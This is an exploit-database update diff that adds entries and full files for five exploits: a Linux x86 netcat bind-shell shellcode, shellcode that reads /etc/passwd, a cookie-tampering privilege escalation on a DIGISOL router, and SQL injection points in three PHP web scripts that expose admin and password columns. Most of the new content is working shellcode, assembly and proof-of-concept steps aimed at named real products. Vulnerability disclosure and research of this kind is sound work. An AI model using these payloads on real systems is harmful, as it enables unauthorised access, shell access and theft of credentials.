DB: 2017-03-20

5 new exploits

Linux/x86 - Bind Shell Shellcode (51 bytes)
Linux/x86 - Bind Shell Shellcode (42 bytes)
Linux/x86 - File Reader Shellcode (54 Bytes)
iFdate Social Dating Script 2.0 - SQL Injection
DIGISOL DG-HR1400 1.00.02 Wireless Router - Privilege Escalation
Omegle Clone - SQL Injection
Secure Download Links - 'dc' Parameter SQL Injection

files.csv

@@ -15959,7 +15959,8 @@ id,file,description,date,author,platform,type,port
 41510,platforms/lin_x86-64/shellcode/41510.nsam,"Linux/x86-64 - Polymorphic NetCat Reverse Shell Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
 41581,platforms/win_x86/shellcode/41581.c,"Windows x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",win_x86,shellcode,0
 41630,platforms/lin_x86/shellcode/41630.asm,"Linux/x86 - Encoded exceve(_/bin/sh_) Shellcode (44 Bytes)",2017-03-17,WangYihang,lin_x86,shellcode,0
-41631,platforms/lin_x86/shellcode/41631.c,"Linux/x86 - Bind Shell Shellcode (51 bytes)",2017-03-17,"Oleg Boytsev",lin_x86,shellcode,0
+41631,platforms/lin_x86/shellcode/41631.c,"Linux/x86 - Bind Shell Shellcode (42 bytes)",2017-03-17,"Oleg Boytsev",lin_x86,shellcode,0
+41635,platforms/lin_x86/shellcode/41635.txt,"Linux/x86 - File Reader Shellcode (54 Bytes)",2017-03-19,WangYihang,lin_x86,shellcode,0
 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@@ -37542,3 +37543,7 @@ id,file,description,date,author,platform,type,port
 41625,platforms/hardware/webapps/41625.txt,"AXIS Communications - Cross-Site Scripting / Content Injection",2017-03-17,Orwelllabs,hardware,webapps,0
 41626,platforms/hardware/webapps/41626.txt,"AXIS Multiple Products - Cross-Site Request Forgery",2017-03-17,Orwelllabs,hardware,webapps,0
 41627,platforms/php/webapps/41627.txt,"Departmental Store Management System 1.2 - SQL Injection",2017-03-17,"Ihsan Sencan",php,webapps,0
+41632,platforms/php/webapps/41632.txt,"iFdate Social Dating Script 2.0 - SQL Injection",2017-03-18,"Ihsan Sencan",php,webapps,0
+41633,platforms/hardware/webapps/41633.txt,"DIGISOL DG-HR1400 1.00.02 Wireless Router - Privilege Escalation",2017-03-18,Indrajith.A.N,hardware,webapps,0
+41634,platforms/php/webapps/41634.txt,"Omegle Clone - SQL Injection",2017-03-18,"Ihsan Sencan",php,webapps,0
+41636,platforms/php/webapps/41636.txt,"Secure Download Links - 'dc' Parameter SQL Injection",2017-03-19,"Ihsan Sencan",php,webapps,0

platforms/hardware/webapps/41633.txt

@@ -0,0 +1,76 @@
+Title:
+======
+
+Cookie based privilege escalation in DIGISOL DG-HR1400 1.00.02 wireless router.
+
+CVE Details:
+============
+CVE-2017-6896
+
+Reference:
+========== 
+
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6896
+https://vuldb.com/sv/?id.97954
+https://www.indrajithan.com/DIGISOL_router_previlage_escaltion
+
+
+Credit:
+======
+
+Name: Indrajith.A.N
+Website: https://www.indrajithan.com
+
+Date:
+====
+
+13-03-2017
+
+Vendor:
+======
+
+DIGISOL router is a product of Smartlink Network Systems Ltd. is one of India's leading networking company. It was established in the year 1993 to prop the Indian market in the field of Network Infrastructure.
+
+Product:
+=======
+
+DIGISOL DG-HR1400 is a wireless Router
+
+
+Product link: http://wifi.digisol.com/datasheets/DG-HR1400.pdf
+
+Abstract details:
+=================
+
+privilege escalation vulnerability in the DIGISOL DG-HR1400 wireless router enables an attacker escalate his user privilege to an admin just by modifying the Base64encoded session cookie value 
+
+Affected Version:
+=============
+
+<=1.00.02
+
+
+Exploitation-Technique:
+===================
+
+Remote
+
+
+Severity Rating:
+===================
+
+8
+
+
+Proof Of Concept :
+==================
+
+1) Login to the router as a User where router sets the session cookie value to VVNFUg== (Base64 encode of "USER")
+2) So Encode "ADMIN" to base64 and force set the session cookie value to QURNSU4= 
+3) Refresh the page and you are able to escalate your USER privileges to ADMIN.
+
+
+Disclosure Timeline:
+======================================
+Vendor Notification: 13/03/17
+

platforms/lin_x86/shellcode/41631.c

@@ -1,20 +1,17 @@
 /*
-# Super_Small_Bind_Shell (x86)
+# Super_Small_Bind_Shell 2 (x86)
 # Date: 17.03.2017
-# This shellcode will listen on port 37 and show you how deep the rabbit hole goes
+# This shellcode will listen on random port and show you how deep the rabbit hole goes
-# Please note that 37 port is below 1024 and thus privileged!
+# Please note that ports below 1024 require high privileges to bind!
 # Shellcode Author: ALEH BOITSAU
-# Shellcode Length: 51 bytes ;)
+# Shellcode Length: 42 bytes!) 
 # Tested on: Debian GNU/Linux 8/x86_64
-# Command: gcc -m32 -z execstack super_small_bind_shell.c -o super_small_bind_shell
+# Command: gcc -m32 -z execstack super_small_bind_shell2.c -o super_small_bind_shell2
 
 global _start
 section .text
  _start:
     xor eax, eax
-    push eax
-    push 0x3733702d     ;-p37
-    mov esi, esp
 
     push eax
     push 0x68732f2f     ;-le//bin//sh
@@ -28,7 +25,6 @@ section .text
     mov ebx, esp
 
     push eax
-    push esi
     push edi
     push ebx
     mov ecx, esp
@@ -40,7 +36,7 @@ section .text
 #include <string.h>
 
 unsigned char shellcode[] =
-"\x31\xc0\x50\x68\x2d\x70\x33\x37\x89\xe6\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x68\x2d\x6c\x65\x2f\x89\xe7\x50\x68\x2f\x2f\x6e\x63\x68\x2f\x62\x69\x6e\x89\xe3\x50\x56\x57\x53\x89\xe1\xb0\x0b\xcd\x80";
+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x68\x2d\x6c\x65\x2f\x89\xe7\x50\x68\x2f\x2f\x6e\x63\x68\x2f\x62\x69\x6e\x89\xe3\x50\x57\x53\x89\xe1\xb0\x0b\xcd\x80";
 main()
 {
 	printf("Shellcode Length: %d\n",strlen(shellcode));

platforms/lin_x86/shellcode/41635.txt

@@ -0,0 +1,95 @@
+;================================================================================
+; The MIT License
+;
+; Copyright (c) <year> <copyright holders>
+;
+; Permission is hereby granted, free of charge, to any person obtaining a copy
+; of this software and associated documentation files (the "Software"), to deal
+; in the Software without restriction, including without limitation the rights
+; to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+; copies of the Software, and to permit persons to whom the Software is
+; furnished to do so, subject to the following conditions:
+; 
+; The above copyright notice and this permission notice shall be included in
+; all copies or substantial portions of the Software.
+; 
+; THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+; IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+; FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+; AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+; LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+; OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
+; THE SOFTWARE.
+;================================================================================
+;     Name : Linux/x86 - Anyfile Reader Shellcode (54 Bytes)
+;     Author : WangYihang
+;     Email : wangyihanger@gmail.com
+;     Tested on: Linux_x86
+;     Shellcode Length: 54
+;================================================================================
+; Shellcode : 
+; You can complie it to verify by using : gcc -z execstack -o exploit exploit.c
+char shellcode[] = "\x31\xc9\x51\x68\x73\x73\x77\x64"
+                             "\x68\x2f\x2f\x70\x61\x68\x2f\x65"
+                             "\x74\x63\x89\xe3\x31\xc0\x99\xb0"
+                             "\x05\xcd\x80\x89\xc7\xb2\xff\x89"
+                             "\xe1\x89\xfb\xb0\x03\xcd\x80\xb3"
+                             "\x01\xb0\x04\xcd\x80\xfe\xca\x80"
+                             "\xfa\x01\x74\x02\xeb\xe9"
+int main(){
+    void(*exploit)();
+    exploit = &shellcode;
+    exploit();
+}
+;================================================================================
+; Python : 
+;        shellcode = "\x31\xc9\x51\x68\x73\x73\x77\x64"
+;        shellcode += "\x68\x2f\x2f\x70\x61\x68\x2f\x65"
+;        shellcode += "\x74\x63\x89\xe3\x31\xc0\x99\xb0"
+;        shellcode += "\x05\xcd\x80\x89\xc7\xb2\xff\x89"
+;        shellcode += "\xe1\x89\xfb\xb0\x03\xcd\x80\xb3"
+;        shellcode += "\x01\xb0\x04\xcd\x80\xfe\xca\x80"
+;        shellcode += "\xfa\x01\x74\x02\xeb\xe9"
+;================================================================================
+; Assembly language code : 
+global _start
+_start:
+; int open(const char *pathname, int flags);
+xor ecx, ecx ; #DEFINE O_RDONLY 0
+; push \x00 to the stack to end the filename (string)
+push ecx
+; push filename to the stack (You can also change the filename to anyfile you want to read)
+; But your input must in reverse order by 4 bytes.
+; You can use '/' to file the 0 bytes , because execve() will ignore the muti '/' in your filepath
+push "sswd"
+push "//pa"
+push "/etc"
+mov ebx, esp
+xor eax, eax
+cdq
+mov al, 05H
+int 80H
+mov edi, eax ; save the fd
+mov dl, 1+0FEH
+reading:
+; ssize_t read(int fd, void *buf, size_t count);
+;mov dl, 0FFH ; read 0xFF Bytes to the stack
+mov ecx, esp
+mov ebx, edi ; get the fd
+mov al, 03H
+int 80H
+; ssize_t write(int fd, const void *buf, size_t count);
+mov bl,1
+mov al, 04H
+int 80H
+; continue reading ? 
+dec dl
+cmp dl, 1H
+jz exit ; jmp out
+; continue reading!
+jmp reading
+exit:
+; void _exit(int status);
+; mov eax, 1
+; int 80H
+;================================================================================

platforms/php/webapps/41632.txt

@@ -0,0 +1,40 @@
+# # # # #
+# Exploit Title: iFdate Social Dating Script v2.0 - SQL Injection
+# Google Dork: N/A
+# Date: 18.03.2017
+# Vendor Homepage: http://turnkeycentral.com/
+# Software: http://turnkeycentral.com/scripts/social-dating-script/
+# Demo: http://demo.turnkeycentral.com/ifdate/index.php
+# Version: 2.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/members_search_results.php?gender=[SQL]
+# http://localhost/[PATH]/members_search_results.php?sexuality=[SQL]
+# http://localhost/[PATH]/members_search_results.php?marital=[SQL]
+# http://localhost/[PATH]/members_search_results.php?ethnic=[SQL]
+# http://localhost/[PATH]/members_search_results.php?country=[SQL]
+# http://localhost/[PATH]/members_search_results.php?picture=[SQL]
+# http://localhost/[PATH]/members_search_results.php?online=[SQL]
+# http://localhost/[PATH]/my_profile_error.php?error_name=[SQL]
+# http://localhost/[PATH]/my_profile_pictures.php?username=[SQL]
+# http://localhost/[PATH]/my_profile_buddies.php?username=[SQL]
+# http://localhost/[PATH]/my_profile_videos.php?username=[SQL]
+# http://localhost/[PATH]/my_profile.php?username=[SQL]
+# http://localhost/[PATH]/my_profile_guestbook.php?username=[SQL]
+# members :id
+# members :username
+# members :email
+# members :password
+# members :signup_date
+# members :signup_ip
+# members :banned
+# members :active
+# members :is_admin
+# Etc..
+# # # # #

platforms/php/webapps/41634.txt

@@ -0,0 +1,29 @@
+# # # # #
+# Exploit Title: Omegle Clone - SQL Injection
+# Google Dork: N/A
+# Date: 18.03.2017
+# Vendor Homepage: http://turnkeycentral.com/
+# Software: http://www.turnkeycentral.com/scripts/omegle-clone/
+# Demo: http://demo.turnkeycentral.com/omegleclone/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/randomChat.php?userId=[SQL]
+# http://localhost/[PATH]/listenToReceive.php?userId=[SQL]
+# http://localhost/[PATH]/typing.php?userId=[SQL]
+# http://localhost/[PATH]/isTyping.php?strangerId=[SQL]
+# http://localhost/[PATH]/saveLog.php?userId=[SQL]
+# pc_settings :AdminID
+# pc_settings :AdminPass
+# pc_settings :Email
+# pc_settings :PayPal
+# pc_settings :IpnMode
+# Etc..
+# # # # #
+

platforms/php/webapps/41636.txt

@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Secure Download Links - SQL Injection
+# Google Dork: N/A
+# Date: 19.03.2017
+# Vendor Homepage: http://sixthlife.net/
+# Software: http://sixthlife.net/product/secure-download-links/
+# Demo: http://www.satyamtechnologies.net/secdown/example.php
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/download.php?dc=[SQL]
+# # # # #